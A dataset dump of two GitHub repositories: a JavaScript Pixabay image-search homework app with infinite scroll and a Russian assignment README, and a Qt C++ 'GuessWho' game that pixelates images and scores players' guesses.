branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/main | <repo_name>Lia-Pavlova/goit-js-hw-13-image-finder<file_sep>/src/js/.d.ts
declare module 'simplelightbox';<file_sep>/src/js/index.js
import '../sass/main.scss';
import PixabayApi from './apiService';
import galleryCards from '../templates/image-grid.hbs';
import { Notify } from 'notiflix';
import SimpleLightbox from 'simplelightbox';
import 'simplelightbox/src/simple-lightbox.scss';
// Cached DOM nodes used throughout the module.
const refs = {
  galleryContainer: document.querySelector('.gallery'),
  searchForm: document.querySelector('#search-form'),
};

// Pixabay HTTP client (tracks the current query and page) and the lightbox
// bound to every <a> inside the gallery.
const pixabayApi = new PixabayApi();
const gallery = new SimpleLightbox('.gallery a');

// Infinite scroll: when the observed sentinel card enters the viewport,
// fetch the next page and stop watching that card (a fresh sentinel is
// registered after each successful fetch — see AddObserver()).
const observer = new IntersectionObserver((entries, observer) => {
  entries.forEach(entry => {
    if (entry.isIntersecting) {
      fetchPhotos();
      observer.unobserve(entry.target);
    }
  });
});

bindEvents();
// Wires up DOM event handlers once at module load (called above; relies on
// function-declaration hoisting).
function bindEvents() {
  refs.searchForm.addEventListener('submit', onSearch);
}
// Registers the last rendered gallery card as the infinite-scroll sentinel;
// when it becomes visible, the IntersectionObserver callback loads more.
function AddObserver() {
  const lastCard = refs.galleryContainer.querySelector('li:last-child');
  observer.observe(lastCard);
}
// Submit handler: stores the trimmed query on the API client, wipes the
// previous results and fetches the first page.
function onSearch(event) {
  event.preventDefault();
  const searchQuery = refs.searchForm.query.value.trim();
  pixabayApi.query = searchQuery;
  clearGalleryContainer();
  fetchPhotos(true);
}
// Fetches one page of results, renders it, and decides whether to keep the
// infinite scroll alive. `isFirstQuery` enables the found/none notifications.
async function fetchPhotos(isFirstQuery = false) {
  try {
    const data = await pixabayApi.getPhotos();
    appendGalleryMarkup(data.hits);

    if (isFirstQuery) {
      if (!data.totalHits) {
        // Nothing matched: notify and do not register a scroll sentinel.
        Notify.failure('Sorry, there are no images matching your search query. Please try again.');
        return;
      }
      Notify.success(`Hooray! We found ${data.totalHits} images.`);
    }

    // A short page means Pixabay has no further results for this query.
    const reachedEnd = data.hits.length < pixabayApi.perPage;
    if (reachedEnd) {
      Notify.info("We're sorry, but you've reached the end of search results.");
      return;
    }

    AddObserver();
  } catch (err) {
    console.log(err);
    Notify.failure(`Something went wrong(${err.message})`);
  }
}
// Renders the hits through the Handlebars template, appends them to the
// gallery and tells the lightbox to pick up the new anchors.
function appendGalleryMarkup(hits) {
  const cardsHtml = galleryCards(hits);
  refs.galleryContainer.insertAdjacentHTML('beforeend', cardsHtml);
  gallery.refresh();
}
// Empties the gallery list before rendering results for a new search term.
function clearGalleryContainer() {
  refs.galleryContainer.innerHTML = '';
}<file_sep>/README.md
# goit-js-hw-13-image-finder
# Критерии приема
- Созданы репозитории `goit-js-hw-13-image-finder`.
- При сдаче домашней работы есть две ссылки для каждого проекта: на исходные
файлы и рабочую страницу на GitHub pages.
- При посещении рабочей страницы (GitHub pages) задания, в консоли нету ошибок и
предупреждений
- Имена переменных и функций понятные, описательные
- Проект собран с помощью
[parcel-project-template](https://github.com/goitacademy/parcel-project-template)
- Код отформатирован с помощью `Prettier`
- Добавь минимальную стилизацию
- Есть файл `apiService.js` с дефолтным экспортом объекта отвечающего за логику
HTTP-запросов к API
## Задание - поиск изображений
Напиши небольшое приложение поиска и просмотра изображений по ключевому слову
# Parcel boilerplate
## Скрытые файлы
Включите отображение скрытых файлов и папок в проводнике своей операционной системы, иначе вы не
сможете выбрать и скопировать себе файлы настроек проекта, имена которых начинаются с точки.
## Зависимости
На компьютере должна быть установлена LTS-версия [Node.js](https://nodejs.org/en/) со всеми
дополнительными инструментами кроме **Chocolatey** - его ставить не нужно.
## Перед началом работы
Один раз на проект установить все зависимости.
```shell
npm ci
```
### Разработка
Запустить режим разработки.
```shell
npm run dev
```
Во вкладке браузера перейти по адресу [http://localhost:1234](http://localhost:1234).
### Деплой
Сборка будет автоматически собирать и деплоить продакшен версию проекта на GitHub Pages, в ветку
`gh-pages`, каждый раз когда обновляется ветка `main`. Например, после прямого пуша или принятого
пул-реквеста. Для этого необходимо в файле `package.json` отредактировать поле `homepage` и скрипт
`build`, заменив `имя_пользователя` и `имя_репозитория` на свои.
```json
"homepage": "https://имя_пользователя.github.io/имя_репозитория",
"scripts": {
"build": "parcel build src/*.html --public-url /имя_репозитория/"
},
```
На всякий случай стоит зайти в настройки репозитория `Settings` > `Pages` и убедиться что продакшен
версии файлов раздаются из папки `/root` ветки `gh-pages`.
Через какое-то время живую страницу можно будет посмотреть по адресу указанному в отредактированном
свойстве `homepage`, например
[https://goitacademy.github.io/parcel-project-template](https://goitacademy.github.io/parcel-project-template).
## Файлы и папки
- Все паршалы файлов стилей должны лежать в папке `src/sass` и импортироваться в
`src/sass/main.scss`
- Изображения добавляйте в папку `src/images`, заранее оптимизировав их. Сборщик просто копирует
используемые изображения чтобы не нагружать систему оптимизацией картинок, так как на слабых
компьютерах это может занять много времени.
## Инструкции Pixabay API
Для HTTP-запросов используй публичный
[Pixabay API](https://pixabay.com/api/docs/). Зарегистрируйся и получи ключ.
URL-строка запроса:
```bash
https://pixabay.com/api/?image_type=photo&orientation=horizontal&q=что_искать&page=номер_страницы&per_page=12&key=твой_ключ
```
Pixabay API поддерживает пагинацию, пусть в ответе приходит по 12 объектов,
установлено в параметре `per_page`. По умолчанию параметр `page` равен `1`. При
каждом последующем запросе `page` увеличивается на 1, а при поиске по новому
ключевому слову необходимо сбрасывать его значение в `1`.
Каждое изображение описывается объектом.
```json
{
"comments": 78,
"downloads": 63296,
"favorites": 558,
"id": 1508613,
"imageHeight": 2135,
"imageSize": 1630104,
"imageWidth": 2894,
"largeImageURL": "https://pixabay.com/get/57e5d54b4c53af14f6da8c7dda793376173cd8e7524c704c702873dc9f44c551_1280.jpg",
"likes": 575,
"pageURL": "https://pixabay.com/photos/cat-animal-cat-portrait-cat-s-eyes-1508613/",
"previewHeight": 110,
"previewURL": "https://cdn.pixabay.com/photo/2016/07/10/21/47/cat-1508613_150.jpg",
"previewWidth": 150,
"tags": "cat, animal, cat portrait",
"type": "photo",
"user": "cocoparisienne",
"userImageURL": "https://cdn.pixabay.com/user/2018/11/26/11-06-29-714_250x250.jpg",
"user_id": 127419,
"views": 127450,
"webformatHeight": 472,
"webformatURL": "https://pixabay.com/get/57e5d54b4c53af14f6da8c7dda793376173cd8e7524c704c702873dc9f44c551_640.jpg",
"webformatWidth": 640
}
```
Тебе интересны следующие свойства:
- `webformatURL` - ссылка на маленькое изображение для списка карточек
- `largeImageURL` - ссылка на большое изображение (смотри пункт 'дополнительно')
- `likes` - количество лайков
- `views` - количество просмотров
- `comments` - количество комментариев
- `downloads` - количество загрузок
## Форма поиска
Создает DOM-элемент следующей структуры. Можно использовать шаблонизацию.
```html
<form class="search-form" id="search-form">
<input
type="text"
name="query"
autocomplete="off"
placeholder="Search images..."
/>
</form>
```
## Галерея изображений
Создает DOM-элемент следующей структуры.
```html
<ul class="gallery">
<!-- Список <li> с карточками изображений -->
</ul>
```
## Карточка изображения
Создает DOM-элемент следующей структуры.
```html
<div class="photo-card">
<img src="" alt="" />
<div class="stats">
<p class="stats-item">
<i class="material-icons">thumb_up</i>
1108
</p>
<p class="stats-item">
<i class="material-icons">visibility</i>
320321
</p>
<p class="stats-item">
<i class="material-icons">comment</i>
129
</p>
<p class="stats-item">
<i class="material-icons">cloud_download</i>
176019
</p>
</div>
</div>
```
Для иконок используются
[Material icons](https://google.github.io/material-design-icons/). Для их
корректной работы достаточно в HTML-файле добавить ссылку на веб-шрифт.
```html
<link
href="https://fonts.googleapis.com/icon?family=Material+Icons"
rel="stylesheet"
/>
```
Или добавив npm-пакет `material-design-icons` и импортировав веб-шрифт в
`index.js`.
## Кнопка 'Load more'
При нажатии на кнопку `Load more` должна догружаться следующая порция
изображений и рендериться вместе с предыдущими.
Страница должна автоматически плавно проскроливаться после рендера изображений,
чтобы перевести пользователя на следующие загруженные изображения. Используй
метод
[Element.scrollIntoView()](https://developer.mozilla.org/en-US/docs/Web/API/Element/scrollIntoView).
```js
const element = document.getElementById('.my-element-selector');
element.scrollIntoView({
behavior: 'smooth',
block: 'end',
});
```
## Дополнительно
- Можно добавить плагин нотификаций, например
[pnotify](https://github.com/sciactive/pnotify), и показывать нотификации на
результат HTTP-запросов
- Можно добавить функционал отображения большой версии изображения через плагин
модального окна, например
[basicLightbox](https://basiclightbox.electerious.com/), при клике на
изображение галереи
- Вместо кнопки `Load more` можно сделать бесконечную загрузку при скроле
используя `Intersection Observer`.
| f9ee33c604ba0fc2c942b81a7864bb20292c30b6 | [
"JavaScript",
"TypeScript",
"Markdown"
] | 3 | TypeScript | Lia-Pavlova/goit-js-hw-13-image-finder | 66d5d1802dd9e05e14f56791f0000776d6185904 | a2fd0c3760a084d0def9b0d443f6a254257e9184 |
refs/heads/master | <file_sep>#include "player.h"
#include "guess.h"
// Creates a player with the given display name and an empty guess history.
// Uses the member-initializer list instead of default-construct-then-assign.
Player::Player(QString name)
    : name(name)
{
}
// Returns the player's display name.
QString Player::getName() const
{
    return name;
}

// Replaces the player's display name.
void Player::setName(const QString &value)
{
    name = value;
}
// Records one guessing round for this player.
// personsGuessed: multiplier chosen in the guess dialog; score: base points
// of the round; fileName: image the guess was made on.
// NOTE(review): the Guess objects are heap-allocated and Player declares no
// destructor that frees `guesses` — presumably a leak; confirm.
void Player::addGuess(int personsGuessed, int score, QString fileName)
{
    guesses.append(new Guess(personsGuessed, score, fileName));
}
int Player::getScore()
{
int result = 0;
for (Guess* g : guesses) {
result += g->getScore();
}
return result;
}
<file_sep>#ifndef CONFIGURATION_H
#define CONFIGURATION_H
#include <QVector>
#include <QSettings>
#include <QSharedDataPointer>
class ConfigurationData;
// Value-type application settings (image scaling limits, slideshow timing,
// pixelation step sizes). Backed by a QSharedDataPointer, so copies are
// cheap and share state copy-on-write.
class Configuration {
public:
    Configuration();
    Configuration(const Configuration &other);
    Configuration& operator=(const Configuration &other);
    ~Configuration();

    // Load / persist the settings via the given QSettings object.
    void readSettings(QSettings &settings);
    void writeSettings(QSettings &settings);

    // Maximum dimensions images are scaled to before pixelation.
    int getImageHeight() const;
    void setImageHeight(int value);
    int getImageWidth() const;
    void setImageWidth(int value);

    // Slideshow tick interval in milliseconds.
    int getDuration() const;
    void setDuration(int value);

    // Pixel block sizes used by the reveal steps.
    QVector<int> getSizes() const;
    void setSizes(const QVector<int> &value);

    // Opens the modal settings dialog and applies accepted values.
    void showDialog();

private:
    QSharedDataPointer<ConfigurationData> d;
};
#endif // CONFIGURATION_H
<file_sep>#ifndef IMAGESPAGE_H
#define IMAGESPAGE_H
#include <QWizardPage>
namespace Ui {
class ImagesPage;
}
// Wizard page for picking the image files of a game. The chosen paths are
// exposed through the "filenames" property so the wizard field system
// (registerField) can read them once the wizard finishes.
class ImagesPage : public QWizardPage
{
    Q_OBJECT
    Q_PROPERTY(QStringList filenames READ filenames WRITE setFilenames NOTIFY filenamesChanged)

public:
    explicit ImagesPage(QWidget *parent = 0);
    ~ImagesPage();

    // The page is complete (Next enabled) once at least one file is listed.
    virtual bool isComplete() const override;

    // Current list of selected image paths.
    QStringList filenames();

public slots:
    void setFilenames(QStringList list);

signals:
    void filenamesChanged();

protected:

private:
    Ui::ImagesPage *ui;

    // Appends one path and re-evaluates page completeness.
    void addFilename(QString filename);

private slots:
    void on_addFilesButton_clicked();
    void on_removeButton_clicked();
};
#endif // IMAGESPAGE_H
<file_sep>#include "guessdialog.h"
#include "ui_guessdialog.h"
// Modal dialog asking how many players guessed the image. Each multiplier
// button stores its value and accepts the dialog.
GuessDialog::GuessDialog(int score, QWidget *parent) :
    QDialog(parent),
    ui(new Ui::GuessDialog)
{
    ui->setupUi(this);
    // Shows the number of points at stake for this round.
    ui->scoreLabel->setText(QString::number(score));
}

GuessDialog::~GuessDialog()
{
    delete ui;
}

// The three slots below record the multiplier and close with Accepted.
void GuessDialog::on_x1Button_clicked()
{
    multi = 1;
    accept();
}

void GuessDialog::on_x2Button_clicked()
{
    multi = 2;
    accept();
}

void GuessDialog::on_x3Button_clicked()
{
    multi = 3;
    accept();
}

// Multiplier chosen by the user; only meaningful after exec() == Accepted.
int GuessDialog::getMulti() const
{
    return multi;
}
<file_sep>#ifndef GUESS_H
#define GUESS_H
#include <QString>
// One scored guessing round: base points times the dialog multiplier.
class Guess {
public:
    // personsGuessed: multiplier from the guess dialog; score: base points;
    // fileName: image the guess was made on.
    Guess(int personsGuessed, int score, QString fileName);

    // Points earned for this round (score * personsGuessed).
    int getScore();

private:
    int personsGuessed;
    int score;
    QString fileName;
};
#endif // GUESS_H
<file_sep>#ifndef GUESSDIALOG_H
#define GUESSDIALOG_H
#include <QDialog>
namespace Ui {
class GuessDialog;
}
// Modal dialog asking how many players guessed correctly; exposes the
// chosen multiplier via getMulti() after the dialog is accepted.
class GuessDialog : public QDialog
{
    Q_OBJECT

public:
    // score: the points at stake, displayed in the dialog.
    explicit GuessDialog(int score, QWidget *parent = 0);
    ~GuessDialog();

    int getMulti() const;

public slots:
    void on_x1Button_clicked();
    void on_x2Button_clicked();
    void on_x3Button_clicked();

private:
    Ui::GuessDialog *ui;
    int multi;  // NOTE(review): uninitialized until one of the buttons is clicked
};
#endif // GUESSDIALOG_H
<file_sep>#ifndef PIXELATOR_H
#define PIXELATOR_H
#include <vector>
#include <QPixmap>
struct QImage;
namespace gw {
// Stateless helper that mosaics a pixmap into uniform color blocks by
// averaging the RGB channels over each pixelSize x pixelSize square.
class Pixelator {
public:
    // Returns a pixelated copy of `source`; `pixelSize` is the block edge
    // length in pixels.
    static QPixmap doPixelate(const QPixmap& source, const int pixelSize) noexcept;

private:
    //Get a line of pixel's average greyness
    //From x1 to (not including) x2
    //From http://www.richelbilderbeek.nl
    static QRgb getPixel(const QImage& image, const int x1, const int x2, const int y) noexcept;

    //Get a square of pixels' average greyness
    //From http://www.richelbilderbeek.nl
    static QRgb getPixel(const QImage& image, const int x1, const int y1, const int x2, const int y2) noexcept;

    //Set a square of pixels' color
    //From http://www.richelbilderbeek.nl
    static void setPixel(QImage& image, const int x1, const int y1, const int x2, const int y2, const QRgb color) noexcept;

    //Set a line of pixel's color
    //From http://www.richelbilderbeek.nl/CppSetPixel.htm
    static void setPixel(QImage& image, const int x1, const int x2, const int y, const QRgb color) noexcept;
};
} //~namespace gw
#endif
<file_sep>#ifndef PLAYER_H
#define PLAYER_H
#include <QList>
class Guess;
// A game participant: a display name plus the scored guesses accumulated
// over the rounds.
class Player {
public:
    Player(QString name);

private:
    QString name;
    // NOTE(review): heap-allocated entries are never freed here — presumably
    // a leak; confirm ownership.
    QList<Guess*> guesses;

public:
    // Records one round (multiplier, base score, image file).
    void addGuess(int personsGuessed, int score, QString fileName);
    // Sum of all recorded guesses' points.
    int getScore();

    QString getName() const;
    void setName(const QString &value);
};
#endif // PLAYER_H
<file_sep>#ifndef GUESSWHO_H
#define GUESSWHO_H
#include <QMainWindow>
#include "configuration.h"
class Game;
class PlayerInfo;
class QPushButton;
class QLabel;
namespace Ui {
class GuessWho;
}
// Main window: shows the pixelated image, per-player guess buttons and
// score panels; owns the Game instance and the persisted configuration.
class GuessWho : public QMainWindow
{
    Q_OBJECT

public:
    explicit GuessWho(QWidget *parent = 0);
    ~GuessWho();

protected:
    // Saves window geometry and configuration before closing.
    void closeEvent(QCloseEvent *event) override;

private:
    Ui::GuessWho *ui;
    Game *game = nullptr;         // recreated on every "New Game"
    Configuration config;
    QList<PlayerInfo*> infos;     // one score panel per player
    QList<QPushButton*> buttons;  // one guess button per player

    void readSettings();
    void writeSettings();
    // Connects the current Game's signals to this window.
    void connectUI();
    QLabel* pixelCountLabel;

signals:
    // Emitted with the player's index when their guess button is pressed.
    void guessed(int player);

private slots:
    void togglePlayerButtons(bool enabled);
    void refreshImage(const QPixmap& image);
    void updateInfo(const int playerIndex);
    void showPlayerButtons();
    void on_actionNewGame_triggered();
    void on_actionSettings_triggered();
    void on_showScoreButton_toggled();
    void on_actionToggleControls_toggled(bool checked);
    void on_toggleShowButton_toggled();
    void on_nextButton_clicked();
    void on_revealButton_clicked();
};
#endif // GUESSWHO_H
<file_sep>#include "settingsdialog.h"
#include "ui_settingsdialog.h"
#include "configuration.h"
// Settings dialog pre-filled from the current configuration; the pixel
// sizes are listed for display.
SettingsDialog::SettingsDialog(const Configuration &settings, QWidget *parent) :
    QDialog(parent),
    ui(new Ui::SettingsDialog)
{
    ui->setupUi(this);
    ui->durationEdit->setText(QString::number(settings.getDuration()));
    ui->imageHeightEdit->setText(QString::number(settings.getImageHeight()));
    ui->imageWidthEdit->setText(QString::number(settings.getImageWidth()));
    for (int size : settings.getSizes()) {
        ui->pixelSizesList->addItem(QString::number(size));
    }
}

SettingsDialog::~SettingsDialog()
{
    delete ui;
}

// Values as currently typed; QString::toInt() yields 0 for non-numeric input.
int SettingsDialog::getDuration() const
{
    return ui->durationEdit->text().toInt();
}

int SettingsDialog::getMaxHeight() const
{
    return ui->imageHeightEdit->text().toInt();
}

int SettingsDialog::getMaxWidth() const
{
    return ui->imageWidthEdit->text().toInt();
}
<file_sep>#ifndef GAME_H
#define GAME_H
#include <QObject>
#include <QVector>
#include <QPixmap>
#include <QTimer>
#include <QSettings>
#include "configuration.h"
namespace Ui {
class GameWizard;
}
class Player;
class QWizard;
// Drives one game session: image loading/scaling, the pixelation countdown,
// slideshow timing, the setup wizard and per-player score bookkeeping.
class Game : public QObject
{
    Q_OBJECT
public:
    explicit Game(const Configuration &configuration, QObject *parent = 0);

    // fileNames[index] scaled to the configured maximum dimensions.
    QPixmap getScaledImage(const int index) const;
    // Shows the first image (coarsest pixelation) and locks guessing.
    void start();
    QList<Player *> getPlayers() const;

public slots:
    void loadNextImage();
    void showNextPixelated();
    void startSlideshow();
    void stopSlideshow();
    void revealImage();
    void showWizard();
    void showGuessDialog(int player);

signals:
    // A new rendition (pixelated or revealed) should be displayed.
    void imageChanged(const QPixmap& pixmap);
    void wizardCompleted();
    void guessCompleted(int playerIndex);
    // Enable/disable the per-player guess buttons.
    void uiChanged(bool enabled);

private:
    int currentImageIndex = 0;
    int pixelCountDown = 20;  // index into config.getSizes(), counts down
    int currentScore = 0;     // points the current round is worth
    QTimer timer;             // slideshow tick
    QPixmap currentImage;     // current image, already scaled
    QStringList fileNames;
    QList<Player*> players;
    const Configuration &config;
    Ui::GameWizard *wizardUi;
};
#endif // GAME_H
<file_sep>#include "pixelator.h"
#include <QImage>
// Returns a copy of `source` mosaicked into pixelSize x pixelSize blocks,
// each filled with the average color of the pixels it covers.
QPixmap gw::Pixelator::doPixelate(const QPixmap& source, const int pixelSize) noexcept
{
    // Guard: a non-positive block size would divide by zero below; treat it
    // as "no pixelation" and hand the source back unchanged.
    if (pixelSize <= 0) {
        return source;
    }
    const QImage imageOriginal { source.toImage() };
    QImage imageResult { source.toImage() };
    const int width = source.width();
    const int height = source.height();
    // One extra block row/column so a partial block at the edge is covered.
    const int maxx = 1 + (width / pixelSize);
    const int maxy = 1 + (height / pixelSize);
    for (int y = 0; y != maxy; ++y) {
        const int y1 = (y * pixelSize);
        if (y1 >= height) continue;
        const int y2 = std::min(y1 + pixelSize, height);  // clamp to image edge
        for (int x = 0; x != maxx; ++x) {
            const int x1 = (x * pixelSize);
            if (x1 >= width) continue;
            const int x2 = std::min(x1 + pixelSize, width);
            const QRgb p { getPixel(imageOriginal, x1, y1, x2, y2) };
            setPixel(imageResult, x1, y1, x2, y2, p);
        }
    }
    return QPixmap::fromImage(imageResult);
}
// Average color of the horizontal pixel run [x1, x2) on row y.
// Precondition: x2 > x1 (nPixels must be non-zero — divisor below).
QRgb gw::Pixelator::getPixel(const QImage& image, const int x1, const int x2, const int y) noexcept
{
    const int nPixels = x2 - x1;
    int sumRed = 0;
    int sumGreen = 0;
    int sumBlue = 0;
    for (int x = x1; x != x2; ++x) {
        const QRgb p { image.pixel(x,y) };
        sumRed += qRed(p);
        sumGreen += qGreen(p);
        sumBlue += qBlue(p);
    }
    // Integer division: the per-channel averages are truncated.
    const int averageRed = sumRed / nPixels;
    const int averageGreen = sumGreen / nPixels;
    const int averageBlue = sumBlue / nPixels;
    QRgb rgb { qRgb(averageRed,averageGreen,averageBlue) };
    return rgb;
}
// Average color of the rectangle [x1, x2) x [y1, y2), computed as the
// average of the per-row averages. Precondition: y2 > y1 and x2 > x1.
QRgb gw::Pixelator::getPixel(const QImage& image, const int x1, const int y1, const int x2, const int y2) noexcept
{
    const int nPixelsVertical = y2 - y1;
    int sumRed = 0;
    int sumGreen = 0;
    int sumBlue = 0;
    for (int y = y1; y != y2; ++y) {
        const QRgb p { getPixel(image,x1,x2,y) };
        sumRed += qRed(p);
        sumGreen += qGreen(p);
        sumBlue += qBlue(p);
    }
    const int averageRed = sumRed / nPixelsVertical;
    const int averageGreen = sumGreen / nPixelsVertical;
    const int averageBlue = sumBlue / nPixelsVertical;
    QRgb rgb { qRgb(averageRed, averageGreen, averageBlue) };
    return rgb;
}
// Fills the horizontal run [x1, x2) on row y with `color`.
// Callers (doPixelate) guarantee x2 >= x1.
void gw::Pixelator::setPixel(QImage& image, const int x1, const int x2, const int y, const QRgb color) noexcept
{
    for (int col = x1; col < x2; ++col) {
        image.setPixel(col, y, color);
    }
}

// Fills the rectangle [x1, x2) x [y1, y2) with `color`, one row at a time.
void gw::Pixelator::setPixel(QImage& image, const int x1, const int y1, const int x2, const int y2, const QRgb color) noexcept
{
    for (int row = y1; row < y2; ++row) {
        setPixel(image, x1, x2, row, color);
    }
}
<file_sep>#include "guesswho.h"
#include "ui_guesswho.h"
#include "game.h"
#include "player.h"
#include "playerinfo.h"
#include <QSettings>
#include <QCloseEvent>
#include <QHBoxLayout>
#include <QPushButton>
#include <QAction>
// Builds the main window, hides the score panel, registers the application
// identity for QSettings, restores geometry and schedules the new-game
// wizard to open once the event loop starts.
GuessWho::GuessWho(QWidget *parent) :
    QMainWindow(parent),
    ui(new Ui::GuessWho)
{
    ui->setupUi(this);
    ui->infoWidget->setVisible(false);
    // Must be set before the first QSettings is constructed (readSettings below).
    QCoreApplication::setOrganizationName("linuxrelated");
    QCoreApplication::setOrganizationDomain("linuxrelated.de");
    QCoreApplication::setApplicationName("GuessWho");
    readSettings();
    // Defer until the event loop runs so the window is shown first.
    QTimer::singleShot(0, this, &GuessWho::on_actionNewGame_triggered);
    pixelCountLabel = new QLabel;  // NOTE(review): created but not parented or shown here
}
GuessWho::~GuessWho()
{
    delete ui;
    delete game;  // safe when no game was ever created (nullptr)
}
// Slot: shows the (pixelated or revealed) rendition in the central label.
void GuessWho::refreshImage(const QPixmap &image)
{
    ui->imageLabel->setPixmap(image);
}

// Slot: a guess was scored — refresh that player's panel, lock the guess
// buttons and advance to the next pixelation step.
void GuessWho::updateInfo(const int playerIndex)
{
    infos[playerIndex]->update();
    togglePlayerButtons(false);
    on_nextButton_clicked();
}
void GuessWho::showPlayerButtons()
{
auto players = game->getPlayers();
for (int i = 0; i < players.size(); ++i) {
// buttons
auto button = new QPushButton(players[i]->getName(), this);
button->setShortcut(tr("" + i + 1));
buttons += button;
ui->playerButtons->insertWidget(i, button);
connect(button, &QPushButton::clicked, this, [i, this]() {
emit guessed(i);
});
// infos
auto info = new PlayerInfo(players[i], this);
info->update();
infos += info;
auto layout = qobject_cast<QVBoxLayout*>(ui->infoWidget->layout());
layout->addWidget(info);
layout->addStretch();
}
ui->actionToggleControls->setChecked(true);
game->start();
}
// Persists window geometry and configuration on exit.
void GuessWho::closeEvent(QCloseEvent *event)
{
    writeSettings();
    event->accept();
}

// Restores window size/position, then loads the game configuration.
void GuessWho::readSettings()
{
    QSettings settings;
    settings.beginGroup("GuessWho");
    resize(settings.value("size", QSize(400, 400)).toSize());
    move(settings.value("pos", QPoint(200, 200)).toPoint());
    settings.endGroup();
    config.readSettings(settings);
}

// Saves window size/position, then the game configuration.
void GuessWho::writeSettings()
{
    QSettings settings;
    settings.beginGroup("GuessWho");
    settings.setValue("size", size());
    settings.setValue("pos", pos());
    settings.endGroup();
    config.writeSettings(settings);
}
// Wires the current Game instance to the window; called after each new
// Game is constructed (connections die with the old Game object).
void GuessWho::connectUI()
{
    //connect(ui->revealButton, &QPushButton::clicked, game, &Game::revealImage);
    connect(game, &Game::imageChanged, this, &GuessWho::refreshImage);
    connect(game, &Game::wizardCompleted, this, &GuessWho::showPlayerButtons);
    connect(game, &Game::guessCompleted, this, &GuessWho::updateInfo);
    connect(game, &Game::uiChanged, this, &GuessWho::togglePlayerButtons);
    connect(this, &GuessWho::guessed, game, &Game::showGuessDialog);
}

// Enables/disables every per-player guess button at once.
void GuessWho::togglePlayerButtons(bool enabled)
{
    for (auto button : buttons) {
        button->setEnabled(enabled);
    }
}
// Starts a fresh game: hides the control strip, replaces any running Game
// and opens the setup wizard.
void GuessWho::on_actionNewGame_triggered()
{
    // BUG FIX: the original invoked the toggled(false) signal directly, which
    // hid the widgets but left the checkable action itself still checked.
    // setChecked(false) keeps action state and UI in sync (and emits toggled).
    ui->actionToggleControls->setChecked(false);
    delete game;  // deleting nullptr on the first run is safe
    game = new Game(config, parent());
    connectUI();
    game->showWizard();
}
// Opens the modal configuration dialog.
void GuessWho::on_actionSettings_triggered()
{
    config.showDialog();
}

// Shows/hides the score panel beside the image.
// NOTE(review): relies on the panel being item #1 of imageLayout — fragile
// against .ui file changes; confirm when editing the form.
void GuessWho::on_showScoreButton_toggled()
{
    auto layout = ui->imageLayout;
    QLayoutItem* item = layout->itemAt(1);
    auto widget = item->widget();
    widget->setVisible(ui->showScoreButton->isChecked());
}

// Shows/hides the whole control strip below the image.
void GuessWho::on_actionToggleControls_toggled(bool checked)
{
    ui->controlWidget->setVisible(checked);
}
// Toggles slideshow mode: while it runs, manual stepping (next/reveal) and
// the player guess buttons are disabled and the button label flips.
void GuessWho::on_toggleShowButton_toggled()
{
    const bool slideshowOn = ui->toggleShowButton->isChecked();
    if (slideshowOn) {
        game->startSlideshow();
        togglePlayerButtons(false);
    } else {
        game->stopSlideshow();
    }
    ui->toggleShowButton->setText(slideshowOn ? tr("Stop Slideshow")
                                              : tr("Start Slideshow"));
    ui->nextButton->setEnabled(!slideshowOn);
    ui->revealButton->setEnabled(!slideshowOn);
}
// Advances one pixelation step; guessing stays locked until the image is
// revealed, and revealing becomes possible again.
void GuessWho::on_nextButton_clicked()
{
    game->showNextPixelated();
    togglePlayerButtons(false);
    ui->revealButton->setEnabled(true);
}

// Reveals the full image (Game::revealImage also fixes the round's score
// and pre-loads the next image).
void GuessWho::on_revealButton_clicked()
{
    game->revealImage();
    ui->revealButton->setEnabled(false);
}
<file_sep>#include "imagespage.h"
#include "ui_imagespage.h"
#include <QFileDialog>
#include <QListWidget>
// Wizard page for selecting the image files used in a game.
ImagesPage::ImagesPage(QWidget *parent) :
    QWizardPage(parent),
    ui(new Ui::ImagesPage)
{
    ui->setupUi(this);
    // Publish the file list as wizard field "imageFiles" (read by Game::showWizard).
    registerField("imageFiles", this, "filenames");
    ui->removeButton->setEnabled(isComplete());
}

ImagesPage::~ImagesPage()
{
    delete ui;
}
// Lets the user pick images; each path not already listed is appended.
void ImagesPage::on_addFilesButton_clicked()
{
    QStringList fileNames = QFileDialog::getOpenFileNames(this, tr("Load images"), QDir::homePath(), (tr("Image files (*.jpg *.png)")));
    if (!fileNames.isEmpty()) {
        QStringList filesInList = filenames();  // snapshot for the duplicate check
        for (QString filename : fileNames) {
            if (!filesInList.contains(filename)) {
                addFilename(filename);
            }
        }
        emit filenamesChanged();  // notify the wizard-field property system
    }
}
// Removes the selected rows. Deleting a QListWidgetItem detaches it from
// its list widget, so qDeleteAll both frees and removes the rows.
void ImagesPage::on_removeButton_clicked()
{
    qDeleteAll(ui->imageFilesList->selectedItems());
    emit completeChanged();
    ui->removeButton->setEnabled(isComplete());
}

// The wizard may advance once at least one image is listed.
bool ImagesPage::isComplete() const
{
    return ui->imageFilesList->count() > 0;
}
// Collects every path currently shown in the image list widget.
QStringList ImagesPage::filenames()
{
    QStringList paths;
    const int rowCount = ui->imageFilesList->count();
    for (int row = 0; row < rowCount; ++row) {
        paths += ui->imageFilesList->item(row)->text();
    }
    return paths;
}
// Property setter used by the wizard-field system; appends the given paths.
void ImagesPage::setFilenames(QStringList list)
{
    ui->imageFilesList->addItems(list);
}

// Adds one path and re-evaluates whether the page is complete.
void ImagesPage::addFilename(QString filename)
{
    ui->imageFilesList->addItem(filename);
    emit completeChanged();
}
<file_sep>#include "playerspage.h"
#include "ui_playerspage.h"
#include "ui_playerrow.h"
#include <QLineEdit>
#include <QFormLayout>
// Wizard page collecting player names; starts with one name row.
PlayersPage::PlayersPage(QWidget *parent) :
    QWizardPage(parent),
    ui(new Ui::PlayersPage)
{
    ui->setupUi(this);
    addPlayerRow();
}

PlayersPage::~PlayersPage()
{
    delete ui;
}

// Number of name rows created so far (read by Game::showWizard).
int PlayersPage::getPlayerCount() const
{
    return playerCount;
}
// Appends one "Name" line edit, registers it as wizard field "player<N>",
// and disables the add button once the player limit is reached.
void PlayersPage::addPlayerRow()
{
    QLineEdit *playerEdit = new QLineEdit(this);
    ui->playersList->addRow(tr("&Name"), playerEdit);
    // playerCount is incremented as a side effect of building the field name.
    registerField(QString("player") + QString::number(playerCount++), playerEdit);
    if (playerCount == MAX_PLAYERS) {
        ui->addPlayerButton->setEnabled(false);
    }
